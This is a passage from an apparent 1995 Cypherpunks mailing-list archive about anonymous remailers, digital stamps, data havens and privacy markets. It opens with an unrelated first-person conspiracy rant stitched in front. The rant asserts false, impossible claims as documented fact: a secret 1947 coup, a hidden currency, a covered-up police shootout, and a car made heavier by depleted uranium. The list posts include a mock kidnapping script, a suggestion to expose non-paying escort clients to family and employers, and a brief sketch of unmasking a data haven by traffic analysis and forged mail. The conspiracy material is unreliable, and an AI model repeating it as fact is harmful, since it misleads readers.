On June 11 1986 they deliberately influenced me by radio to be present at the intersection of Sherman Avenue and Harvard Street NW at precisely 1:42 am and I had to cross seven blocks of territory that had been sealed by the police. This is documented. I witnessed seven police forces engaged in a shootout that lasted three hours. The police forces were shooting at EACH OTHER and I counted at least thirty verifiable casualties. Although this has never made the newspapers due to the government/corporate conspiracy the information is readily obtainable but must be sought through FOIA requests at the FBI. The files are disguised as traffic fatalities and the true cause of death is not noted. Also documentable is my genetic trait which Johns Hopkins in Baltimore will provide upon demand. I am considered a threat to the CIA because of my superior evolutionary status and my radical thoughts.
In 1971 the United States abandoned the Bretton Woods system of fixed exchange rates and secretly implemented a dual currency system along with ruling elites from other major countries including the USSR and Red China. I know this because agents have tried to buy me off with this currency which exists solely in the form of informational transactions and has no physical manifestations yet makes a mockery of the valueless Dollar. I am a man of integrity and I refused to participate in this plot. Needless to say the federal deficit is measured in dollars and is therefore nonexistent and irrelevant. The secret currency system is solvent.

In 1987 the Wall Street Journal documented the cataclysmic stock market crash but made no mention of the real underlying factors behind it, which again represented a government conspiracy. After I wrote to the Wall Street Journal to point this out, attempts to kill me trebled. There are also listening devices implanted everywhere to monitor my actions and junk mail sorted with DMSO and curare arrives daily. I remove the mail with tweezers and leave it on the counter for the mailman as unreturnable. He wears gloves of course.

The only reason I am still alive is because I persist in making my case public at every opportunity, which means the government does not directly try to kill me but relies on third-party means which I have so far avoided. A rental car I obtained in Sausalito in 1989 was irradiated with depleted uranium which increased the total mass of the car by 33% and would have caused me to go over a cliff were it not for the normal precaution I take of always driving 15 mph under the speed limit. But it is this kind of insidiousness which I am constantly faced with. I also can only cross the street in crosswalks so that any attempt to kill me with a vehicle could not be blamed on pedestrian error.
The only reason I am still alive is because I persist in making my case public at every opportunity, which means the government will not try to kill me directly, since that would verify my claims instantly in the public's eyes. For that reason I urge all of you to write to the media, contact your senators, and do everything you can to let the conspirators know that my story has been heard, and that the eyes of the public are upon the conspiracy. It is only through concerted collective action that I can remain alive and the AmeriKKKan government which has been ruling illegitimately since a secret coup in 1947 (documented at the Library of Congress) can be brought down and freedom restored.

-end?-

From tcmay at netcom.com Mon Jan 9 11:56:00 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 11:56:00 PST
Subject: Rumored CBS "hit" on internet coming
In-Reply-To: <199501091755.JAA10056@well.sf.ca.us>
Message-ID: <199501091955.LAA07671@netcom18.netcom.com>

> >Subject: CBS/C.Chung Plan Hit Job on Internet?
> >
> >A friend tells me that CBS and Connie Chung plan a hit job on Internet
> >on the evening news today, 1/9/95. Apparently it may be in the context
> >of youths supposedly learning how to make bombs from online info. In
> >case I don't get to watch it, could somebody make it a point to watch
> >it and give us a summary of the report. Thanks.

Argghh!! When Connie interviewed me last week, she said I could _whisper_ some dark uses to her and it would just be between the two of us!

Life's a bitch, and so is Connie.

> Reply, if you're inclined, via e-mail. I'm off the list until the Carol
> Ann stuff dies out. - Brad Dolan, bdolan at well.sf.ca.us

It seems to have gone through the "Newbie-nova" (a double newism?) phase and is already dropping exponentially. (By Newbie-nova I mean the spate of initial posts.
I know the syndrome, as I made several posts on my first day on "Cyberia.")

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From rsalz at osf.org Mon Jan 9 12:49:04 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 9 Jan 95 12:49:04 PST
Subject: intelligent discovery agents
Message-ID: <9501092044.AA08382@sulphur.osf.org>

>Visit Sang at http://www.inlink.com/users/sangria/homepage.html
>Sang has more information on Robots, Spiders, Ants, and Worms
>than any other computer person I have yet to link up with.

I suspect your original respondent doesn't get around very much.

Rummaging around the above URL gets you little more than
http://web.nexor.co.uk/mac/doc/robots/robots.html
Tracing down the above URL points you to

You really want to get the WWW conference proceedings; try email to wwwf94 at osf.org and also
http://www.ncsa.uiuc.edu/SDG/IT94/Proceedings/Agents.html

Ob-crypto: there is a Security.html (instead of Agents) but it's more commerce-oriented, except for the DCE Web paper.

From sandfort at crl.com Mon Jan 9 13:08:54 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Mon, 9 Jan 95 13:08:54 PST
Subject: for-pay remailers and FV
In-Reply-To: <199501070231.SAA20999@largo.remailer.net>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> . . .
a remailer consortium would do best to issue a local banknote
> usable only by themselves and have customers settle with the
> consortium issuer, rather than any member of the consortium itself.
> If the consortium issuer were to use blind sigs, the consortium
> members wouldn't be able to ascertain who paid.
>
> The mechanism for settlement could be credit cards directly, mailed in
> checks, even FV. The preferences of the consortium members for issues
> of timeliness of settlement, reversibility, loss sharing, etc. would
> decide the actual choice of settlement mechanism.
> . . .

Gee, this sounds awfully familiar. Maybe Eric will have more luck in getting you remailer folks to listen. I hardly got so much as a peep when I suggested that a remailers' guild create or authorize one or more digital stamp issuers.

Damn, I hate being so far ahead of my time.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From mab at research.att.com Mon Jan 9 13:10:05 1995
From: mab at research.att.com (Matt Blaze)
Date: Mon, 9 Jan 95 13:10:05 PST
Subject: AT&T produces video encryptor -- is it clipper based?
In-Reply-To: <9501091904.AA19196@webster.imsi.com>
Message-ID: <9501091944.AA07520@merckx.info.att.com>

>I just saw a story go by on the dow jones wire saying that AT&T had
>developed a "comprehensive security system for commercial information
>services". It is said to be an encryption system developed jointly by
>Bell Labs and VLSI, and its intended for set-top boxes and "the
>internet". VLSI was one of the contractors on Clipper. Anyone know if
>this is an "escrowed" system? Anyone know any other details?
>
>
>Perry

I wasn't involved in this product, but I know the people who are. No, it's not Clipper based. It's being announced (right now) at the RSA conference (which I'm at at the moment).
More later

-matt

From db at Tadpole.COM Mon Jan 9 14:34:50 1995
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 9 Jan 95 14:34:50 PST
Subject: for-pay remailers and FV
In-Reply-To:
Message-ID: <9501092235.AA15387@tadpole.tadpole.com>

Sandy --

I for one read your proposal and thought, "yep, that's how it should work" and considered the problem solved. Not being a remailer operator (yet) I didn't want to get involved until I was or I had a more concrete proposal (e.g., "I am now accepting $$ for E-stamps, of the form ...")

Also, there is no reason on earth to take FV for payment under such a scheme, if one wishes to preserve anonymity, and not have to deal with the fraud/reversal factors. (The stamp issuer would not know which blind-signed stamps were issued to the turkey who reversed all his credit card transactions two months after buying them -- see various threads on this vis-a-vis using FV to buy blinded digital cash and why it won't work too well.)

However, for maximum anonymity, said consortium or other stamp issuer could easily accept money orders through the mail, with a disk with enclosed blind-signed tokens and the public key to be used in encrypting the stamps, which would be posted to, say, alt.anonymous.messages or whatever. A little overboard for most, but effective at preserving anonymity -- the stamp issuer could be the NSA, and it would make little difference as long as they continued exchanging $$ for stamps and redeeming stamps for $$.

The stamp issuer could also take checks, or, if the fraud and reversibility of credit cards were factored in, accept credit cards directly (possibly e-mailed using PGP.)

I don't see any reason to get FV involved, unless one were so lame as to be unable to get signed up directly with the credit card companies as a merchant -- a process of appropriate complexity to indicate the possession of at least one (1) clue, which is prob.
desirable in someone who's going to be handling remailer finances

Sandy writes:
> Gee, this sounds awfully familiar. Maybe Eric will have more
> luck in getting you remailer folks to listen. I hardly got so
> much as a peep when I suggested that a remailers' guild create
> or authorize one or more digital stamp issuers.
>
> Damn, I hate being so far ahead of my time.
>

From jamesd at netcom.com Mon Jan 9 15:19:01 1995
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 9 Jan 95 15:19:01 PST
Subject: (fwd) Re: Racism on the Internet
Message-ID: <199501092317.PAA08453@netcom5.netcom.com>

Xref: netcom.com alt.internet.services:40076 alt.internet.media-coverage:2932
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!pipex!uunet!nwnexus!news.halcyon.com!usenet
From: mpdillon at halcyon.com (Michael Dillon)
Newsgroups: alt.internet.services,alt.internet.media-coverage
Subject: Re: Racism on the Internet
Date: Wed, 28 Dec 1994 18:11:51 +0000
Organization: Memra Software Inc., Armstrong, B.C., Canada
Lines: 36
Message-ID:
References: <18570UODGFHLRSDHOUP at curvet.com>
NNTP-Posting-Host: halcyon.com

This is forwarded from can.infohighway. Note the quote from Rutkowski at the bottom. This info should be more generally known on the net.

In article <18570UODGFHLRSDHOUP at curvet.com>, dshaw at curvet.com wrote:

>
> IN>ae763 at FreeNet.Carleton.CA (Harvey Goldberg) writes:
>
> >I work for the Canadian Human Rights Commission.
> >I am currently doing research on the use of the
> >Internet for the propagation of hate material.
> >The purpose of the research is to determine what
> >measures could be considered to control the use
> >of the Net for this type of purpose.
>
> >I would appreciate hearing from anyone who has
> >any views, information or comments on this
> >subject or who knows of anywhere on the Internet
> >where this matter is discussed.
>
> According to Tony Rutkowski, Executive Director of the Internet
> Society, "The Internet from a regulatory standpoint falls into the
> category of private value-added networks, and in most countries under
> the treaty provisions of the ITU, as well as the GATT, these are
> networks that are outside the purview of government. To the extent
> that there is any kind of obligation by governments, it is to allow
> such networks to exist on a competitive basis". January 1995>.

---------------------------------------------------------------------
Cool cats, brick bats, bad boys wearin' big hats
Surf's up, my cup, floating, flying, rising up.

Michael Dillon          mpdillon at halcyon.com
C-4 Powerhouse, RR #2   michael at junction.net

From abostick at netcom.com Mon Jan 9 15:21:38 1995
From: abostick at netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:21:38 PST
Subject: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <9501090448.AA14477 at anchor.ho.att.com>, you wrote:

> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography. Namespace control in general is an issue -
> do users get to choose filenames, or list directories, or do they
> have to know the names of files to retrieve.
> Another issue is whether files can only be retrieved by the sender -
> probably a local policy issue.

Pornographic images aren't spam _per_se._ What makes them troublesome is the huge number of people who wish to download them when their availability is widely known. (My ISP's ftp site is being bogged down by lots of accesses; it is speculated that these are people trying to access pornography kept there.)

The obvious fix here is the same as the proposed fix for remailer spamming: charge for access.
As a (presumably) fixed-location data haven, one would want to be able to use some kind of anonymous e-money for payment, but one could also use good, old-fashioned credit card numbers, too.

The feelthy peexture business might well be the cash cow that keeps a data-haven/fortress remailer afloat (if that's not too mixed a metaphor).

                          | PROOF-READER, n: A malefactor who atones for
Alan Bostick              | making your writing nonsense by permitting
abostick at netcom.com    | the compositor to make it unintelligible.
finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg
tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z
+FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A
=gvPB
-----END PGP SIGNATURE-----

From abostick at netcom.com Mon Jan 9 15:22:24 1995
From: abostick at netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:22:24 PST
Subject: Latency, bandwidth, and anonymity
In-Reply-To: <9501090353.AA13655@anchor.ho.att.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <9501090353.AA13655 at anchor.ho.att.com>, wcs at anchor.ho.att.com (bill.stewart at pleasantonca.ncr.com +1-510-484-6204) wrote:

> My initial reaction to "Anonymous video conferencing" was
> "That's when you wear black ski masks and use voice scramblers
> and call from video payphones", i.e. not very useful.
> ("Subcomandata Marcos here...")

I thought so too, at first; but then I thought of this obvious application:

The scene is a bare room, with a single chair in the middle. Seated on the chair is THE VICTIM, whose head covered in a hood. The victim's hands are bound to the armrests, and the legs to those of the chair.

A KIDNAPPER enters the scene and walks over to the victim. The kidnapper's face is obscured, either by a hood or ski mask, or by digital scrambling of the image.
The kidnapper's voice is scrambled digitally. The kidnapper pulls the hood off of the victim's head, and speaks.

KIDNAPPER: Okay, you're on! Talk!

The camera slowly zooms in on the victim's face.

VICTIM (tentatively): Mom? Dad? It's me.

DAD (voice over): Is that really you, son? Are you all right?

VICTIM: It's me. I'm okay. This is no picnic, but they're treating me okay, considering. Listen, I have a message they want you to pass on to the President.

DAD: I don't know if I can get it to him. It's not like we play golf together.

VICTIM (nervously): You have to. You'll find a way. Tell the President that he has to pull the troops out of Belgrade. If the U.S. forces aren't pulled completely out by the end of this month, they say they're going to cut me into pieces and send them to you piece by piece. . . .

etc.

Whether technology is going to be developed for the convenience of kidnappers and terrorists is an open question. But there is clearly at least this one clear use for anonymous video conferencing. There are probably more.

                          | PROOF-READER, n: A malefactor who atones for
Alan Bostick              | making your writing nonsense by permitting
abostick at netcom.com    | the compositor to make it unintelligible.
finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxG1reVevBgtmhnpAQH+jwL/cAzxwneTG6Wl7H9VCasFBH8X4daM8NUx
ORKp06DYybTv45h2baQtINvpDceD4nHt3OThvIEMVg6FCGNq2fBolZHOqTwYP1K6
66QNxEjlyKiQ5dkNKPlwgabFZ6pR0H5y
=sbqg
-----END PGP SIGNATURE-----

From abostick at netcom.com Mon Jan 9 15:32:00 1995
From: abostick at netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:32:00 PST
Subject: Vinge's True Email name ?
In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199501091628.KAA00456 at Starbase.NeoSoft.COM>, you wrote:

> If you *really* want to send him fan mail, I recommend sending it in
> paper form to his publisher. First, this allows him to better handle
> fan mail in batches. Second, this gives his publisher some indication
> of interest in his work, and maybe gets him a better deal on his next
> book.

And if you *really* want to send Vernor Vinge fan mail, and you *can't* *stand* the notion of sending it via snailmail, you can send email to his publisher: pnh at tor.com . That's the email address for Patrick Nielsen Hayden, senior editor at Tor Books. Patrick will know what to do with it. (n.b.: I don't think Patrick is actually Vinge's editor; I think [but am not sure] that Vinge's editor is Jim Frenkel, who oddly enough is married to Vernor Vinge's ex-wife, Joan Vinge.)

(Cypherpunks Duncan Frissell and Sandy Sandfort may recall Patrick from his salad days in San Francisco, when he was part of the crew which took over FREEDOM TODAY and FREE MARKET REPORTER magazines in 1978.)

                          | PROOF-READER, n: A malefactor who atones for
Alan Bostick              | making your writing nonsense by permitting
abostick at netcom.com    | the compositor to make it unintelligible.
finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxGaoeVevBgtmhnpAQFYxQL+JqH6lhYdbhZ5uxaQS8G6dnvtLAZEt49b
Ye/jJG1xpQGqsLu1wV3pCPDvo+/MUHF6dX8Jt/VaSy4aAkFz3dqm3n9btjWBwvpt
LHQjBqwg70PAyiiJ9/MdYj9pUCeurFqr
=5A8z
-----END PGP SIGNATURE-----

From pstemari at erinet.com Mon Jan 9 15:33:37 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Mon, 9 Jan 95 15:33:37 PST
Subject: for-pay remailers and FV
Message-ID: <9501092326.AA05351@eri.erinet.com>

At 03:53 PM 1/9/95, Doug Barnes wrote:
> ...
Also, there is no reason on earth to take FV for payment under
>such a scheme, if one wishes to preserve anonymity, and not have
>to deal with the fraud/reversal factors. (The stamp issuer
>would not know which blind-signed stamps were issued to the
>turkey who reversed all his credit card transactions two months
>after buying them -- see various threads on this vis-a-vis
>using FV to buy blinded digital cash and why it won't work too
>well.)
> ... I don't see any reason to get FV involved, unless one were so lame
>as to be unable to get signed up directly with the credit card
>companies as a merchant -- a process of appropriate complexity
>to indicate the possession of at least one (1) clue, which is prob.
>desirable in someone who's going to be handling remailer finances

MC/Visa require the reversibility of transactions as a condition of their merchant agreements. It's not something peculiar to FV. In fact, under certain conditions it is mandated by federal law. Escort services have a similar problem as far as non-returnability goes, but I don't know how they finesse their way around it.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From pierre at shell.portal.com Mon Jan 9 15:58:54 1995
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Mon, 9 Jan 95 15:58:54 PST
Subject: for-pay remailers and FV
In-Reply-To: <9501092235.AA15387@tadpole.tadpole.com>
Message-ID: <199501092359.PAA27987@jobe.shell.portal.com>

Doug Barnes said:
>
> Sandy --
>
> I for one read your proposal and thought, "yep, that's how it
> should work" and considered the problem solved. Not being a
> remailer operator (yet) I didn't want to get involved until I
> was or I had a more concrete proposal (e.g., "I am now accepting
> $$ for E-stamps, of the form ...")

Same here, but from the other tack: "Remailer Guild???
Give me a break :-)"

My problem with the idea of "Guild" (or any quasi general agreement) of remailer operators is that:

On the one side:
- The whole idea of using a remailer chain comes from distrust of the operators. The operators should be the ones to distrust each other the most.

And on the other side:
- Most of the arguments I see in favor of some higher organisation come from difficulties for the users in using the current payment systems without trace, and come from getting more weight in establishing policies.

Simply put, we'll get to untraceable cash (usable as stamps on every envelope level), and we'll get to systematically encrypted messages (policy only relevant at last stage remailers) soon enough.

A guild trying to distribute funds would need a system of accounting that the operators themselves couldn't mess up. Good luck.

On the other hand, once you have:

- anonymous, untraceable e-money (small amounts are fine, no large bank backing is fine, a simple anonymized Netcash would be fine. Remailers won't be making big money from any single cheating entity anytime soon.)

- reputation systems, in the line of the current remailer pinging. They could include price surveys too. I also see them handling more flow control missions in particular for "everyone a remailer" remailers.

- mailing tools that juggle for you all the different types of remailers, cash, and rep systems.

Then and only then, you get for-pay remailers.

There is still a need for political and legal support for last stage remailers but that's pretty likely to be country specific, and that's certainly independent from a payment system (which would be netwide).

Finally, I do not believe that introducing payment in the remailer system would curb abuse in any significant way. Significant abuse is that which causes significant problems for the operators: posting secret religious technology, forging prime minister mail, harassing a member of any number of opposite persuasions, etc...
Do you think for a minute that a 5 cents postage is going to stop these messages now? And how about when remailers do attain good reliability and untraceability, for 3 cents?

Give up already: remailers are going to transport lots of material that will be offensive to somebody, illegal somewhere, in bad taste here, or at least that somebody (with guns) will want to trace. That's the whole point of remailers. Remailers that want to limit the heat can, for now, restrict to encrypted traffic, there is certainly no dishonor to that.

Pierre.
pierre at shell.portal.com

From lmccarth at ducie.cs.umass.edu Mon Jan 9 17:09:54 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 9 Jan 95 17:09:54 PST
Subject: revoked transactions/guerrilla fee remailers
Message-ID: <199501100115.UAA15109@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Paul J. Ste. Marie writes:
> MC/Visa require the reversibility of transactions as a condition of their
> merchant agreements. It's not something peculiar to FV. In fact, under
> certain conditions it is mandated by federal law. Escort services have a
> similar problem as far as non-returnability goes, but I don't know how they
> finesse their way around it.

Two plausible tactics for escort services:

[0] Price inflation: treat a revoked transaction rather like shoplifting, by passing the costs on to the customers; escort services are not cheap

[1] Embarrassment: tip off family and employers of people who accept escorts, then decide not to pay for them; the perceived threat of publicity should keep plenty of folks in line

There's not much that can be done to someone who uses an escort service once, revokes the transaction, and doesn't care who knows about it.

How might this apply to remailing services ? Right now, with a fairly small customer base, I imagine price inflation would be impractical, but embarrassment might prove fairly effective.
In the developed market we envision, presumably operators could get away with price inflation, but embarrassment would lose much of its potential sting. (I assume that once a critical mass of populace uses remailers, an announcement that Josie Worsham has used a remailer would elicit only yawns.)

Do others see the resulting applicability of additional regulations to remailers as an issue in having them charge for service ? Within the category of fee-charging remailers, the distinction between non-profit and for-profit operations may be worth considering. I suppose that the IRS and analogous agencies would be inclined to ask questions about it, for starters. My threat model for the remailer bramble includes, at a minimum, a host of typical government agencies obligated to wrap everything in red tape. Look for anti-trust investigations to be launched against a price-fixing cartel of remailers.

- - From what I've seen so far, accepting payment would seem to make anonymous _operation_ of a remailer well nigh impossible. Anonymous operation with revenue would require a corresponding level of anonymity in the transfer of money. Until such time as conversion of funds from a net-liquid form to a conventional form becomes unnecessary (or just commonplace ?), financial traffic analysis can't adequately be thwarted.

All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla remailers charging for service any time soon. There's just too much infrastructure to which they'd need to be tied at the moment.

-L. Futplex McCarthy; PGP key by finger or server

"The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir.
Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxHeC2f7YYibNzjpAQGhlQP/fkyvN0QqDkbLhgqecGUaeu3cbCstMd4y
lgs/XzCeiXVt6EiQ8tmDVbq4G0QYTGntph/3knciJopGrH+Nu6LVmiqWNiRWFxm8
zJBRenCW2SN9nRixJiI4S2n0yQ//v9C7sOEfmu9SToQDYc+U1CBNSUhhJAveT1GN
BD4WNFlm/WY=
=VY8W
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxHfcSoZzwIn1bdtAQGyEAGAwKES86hkJ8GkLsYCr+vEAjH1/L2GdrCj
jw0b83L7FHA99sUihIYe2zUUxr+Sqb2b
=7Aai
-----END PGP SIGNATURE-----

From dfloyd at io.com Mon Jan 9 17:25:52 1995
From: dfloyd at io.com (dfloyd at io.com)
Date: Mon, 9 Jan 95 17:25:52 PST
Subject: Data Haven problems
In-Reply-To:
Message-ID: <199501100125.TAA29250@pentagon.io.com>

>
> On Mon, 9 Jan 1995, Mats Bergstrom wrote:
>
> > Hardly. (*.gi0 and *.jp0 for a start?)
> > But what are data havens for, if not for controversial data?
> > One of the greatest needs, if not _the_ greatest, in our times
> > for a data haven is probably for storing porno. There is a
> > tremendous, world-wide demand for porno. Yet, there are numerous
> > countries where sex.gif's found on your disk (encrypted or not,
> > they can use thumb-screws to force the key out of your hands)
> > will put you in a very difficult situation (loss of social
> > status, jail, decapitation). It might be much more convenient
> > for, let's say, a Saudi teenager to store his encrypted private
> > gif's in a data haven in Sweden, download them when he feels
> > the urge and purge the copies after every use.
>
> My feelings exactly.
>
> Are we going to fall prey to the media's assault on porno and resort to
> self-censorship? If a data haven resorted to filtering out all gifs and
> jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my
> porn, nor for my other data.
If it is going to be a datahaven it can't
> fall to such things as filtering data for controversial subject the owner
> doesn't like.
>
>
> i want to know everything http://www.mcs.com/~nesta/home.html
> i want to be everywhere Nesta's Home Page
> i want to fuck everyone in the world &
> i want to do something that matters /-/ a s t e zine
>

My problem is not that people will bitch about my DH. My problem will be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then making a long report how I cater to p*dofiles and other evil denizens that pop from time to time.

Then, I get the police knocking at my door, asking me to come to Club Fed for a looooonnnggg vacation.

Of course, the DH will be hidden by a good remailer (anon.penet.fi), but it is trivial to use traffic analysis to find where the DH lies. Just monitor traffic from/to the remailer and do a series of store/retrieves. Then for confirmation, forge a mail from the dh site to the remailer with the password (obtained from sniffing) to yourself.

This is the main reason I haven't worked on this code for so long, as well as finals and other distractions. Until I find a decent solution to this problem (The alpha test will be a snap... just allow certain people to send/get and ban all others, but once in full working mode this ceases to be a solution.) I am hesitant on setting up a working DH.

From shamrock at netcom.com Mon Jan 9 17:35:14 1995
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 9 Jan 95 17:35:14 PST
Subject: SafeBoot PC Security System
Message-ID:

I helped set up the DigiCash booth at the RSA conference last night when some guy in the same room with us handed me a copy of their SafeBoot PC Security System. It consists of a processor, real-time clock, some other gadgets, and a magnetic transducer -- all embedded in a 3.5 inch floppy casing -- as well as some supporting software. The system interacts with the read/write head of the floppy drive, pretending to be a floppy.
It is supposed to provide for secure drive encryption (DES) and other things. Seems they are giving away one of these devices to each attendee of the conference.

Does anyone on this list have experience with this device? I understand it has been out for a while. I use a Mac at home, and while I am responsible for some PC's at work, these are used for alpha testing of hardware components only, which makes them pretty unstable the way it is and I don't really want to add more trouble just to them to give the device a good workout.

Sounds interesting, though...

-- Lucky Green PGP encrypted mail preferred.

From jrochkin at cs.oberlin.edu Mon Jan 9 17:37:08 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 9 Jan 95 17:37:08 PST
Subject: revoked transactions/guerrilla fee remailers
Message-ID:

At 8:15 PM 01/09/95, L. McCarthy wrote:
> From what I've seen so far, accepting payment would seem to make anonymous _operation_ of a remailer well nigh impossible. Anonymous operation with revenue would require a corresponding level of anonymity in the transfer of money. Until such time as conversion of funds from a net-liquid form to a conventional form becomes unnecessary (or just commonplace ?), financial traffic analysis can't adequately be thwarted. All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla remailers charging for service any time soon. There's just too much infrastructure to which they'd need to be tied at the moment.

Well, that's certainly true, for the reasons you gave. Right now, it's enough of a chore just to get non-anonymously run remailers charging for operation. And it's not easy to set up an effective guerilla remailer either. I think the set of tools and environments that make it possible to run a remailer anonymously and charge for it certainly aren't going to exist until the component problems of charging for a remailer at all and running a guerilla remailer at all are made easy.
I think once both of those problems are dealt with, it won't be too difficult to deal with the combined problem of guerilla for-pay remailers. Or at least, exactly what things are necessary to solve that combined problem will be obvious.

From root at einstein.ssz.com Mon Jan 9 17:44:27 1995
From: root at einstein.ssz.com (root)
Date: Mon, 9 Jan 95 17:44:27 PST
Subject: Pornography, What is it?
Message-ID: <199501100141.TAA00216@einstein.ssz.com>

From: ravage at bga.com
To: cpunks the world over

Hi all,

I am very interested in the data haven issue now that I have my site up. The aspect of pornography is a problem that has to be faced. To this end, I would like to ask that we look at how pornography is defined.

From my own view, I fail to see any way to truly define pornography as anything other than the ravings of a neurotic (both on a personal and a societal level). Every example of pornography I have seen has been put in that category because it contravenes some personal or group taboo.

Take care.

From rockwell at nova.umd.edu Mon Jan 9 18:25:54 1995
From: rockwell at nova.umd.edu (Raul Deluth Miller)
Date: Mon, 9 Jan 95 18:25:54 PST
Subject: data havens
Message-ID: <199501100225.VAA08907@nova.umd.edu>

The problem with encryption, in general, is that it's an attempt to hide information -- unless the information is trivial, encryption is only a temporary measure.

Believe it or not, the government (or, more properly, people associated with the government) is still trying to figure out which industries are Iraqi owned -- one technique being brought to bear is statistical analysis of company activities, with special attention to changes which occurred during the gulf war.

The only way to have data havens be acceptable to the U.S. government would be to have them become acceptable to the U.S. population (or some significant fraction of them). This would imply phasing out the DEA and the IRS, at a minimum.
[Newspaper article this weekend: how it's so horrible that some people deal in cash and thus are evading the IRS.]

More generally, the way to keep a data haven from being located is to make sure it doesn't have a location... This is hard to do without severely impacting latency.

--
Raul D. Miller N=:((*/pq)&|)@ NB. public e, y, n=:*/pq P=:*N/@:# NB. */-.,e e.&factors t=:*/<:pq 1=t|e*d NB. (,-:<:)pq is four large primes, e medium x-:d P,:y=:e P,:x NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d

From rishab at dxm.ernet.in Mon Jan 9 18:45:28 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Mon, 9 Jan 95 18:45:28 PST
Subject: Privacy markets
Message-ID:

mkj at october.ducktown.org wrote:
> Bottom line: Anonymity is the only available tool which puts control over my own privacy firmly into my own hands, where it belongs, and does so without infringing on anyone's freedom of speech. Certainly

Some months ago I extended this to the concept of privacy markets - where individuals will be able to disclose their 'truename value' to providers of services (such as libraries, publications) whose marketing would benefit, in lieu of cash.

I rather think big business is in a better position than government to exploit the 'profiling' fallout of universal use of truenames. In the hope of increasing the declining signal content on the list, I'm reposting my article:

======================
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#35, 31/October/1994: Selling privacy as a commodity

It was once said that you should never post publicly to cyberspace what you don't want to see in tomorrow's newspapers. While newspapers are rarely interested in your idle thoughts, others are. Future employers, advertisers and an army of 'user profilers' have begun to exploit the availability of huge data banks of Net traffic, just waiting to be indexed by your names and opinions.
It is already possible to buy CD-ROM or tape archives of posts to newsgroups on the Internet. Collecting newsgroup posts as they arrive is trivial. Apart from ordinary Internet connections, all newsgroups are available on one-way, open-access satellite data broadcasts. As traffic flows in, it can be indexed and backed up on extremely cheap storage media such as Digital Audio Tape, for later search and retrieval.

While the US National Security Agency is naturally one of the best at hunting for signs of incorrect thinking in cyberspace, several techniques to search large volumes of data by very flexible criteria are publicly available. Electronic writing is one of the best sources for employers to learn the views of prospective employees. The groups people participate in can also form useful inputs to consumer profiles. Some companies have already started offering directory services based on posts to USENET, the semi-official collection of major newsgroups. It is easy to imagine Profiles-R-Us shops that sell dossiers on any individual, detailing political, religious and sexual preferences, and other interesting tidbits - all the nasty things you ever said about Microsoft, for instance!

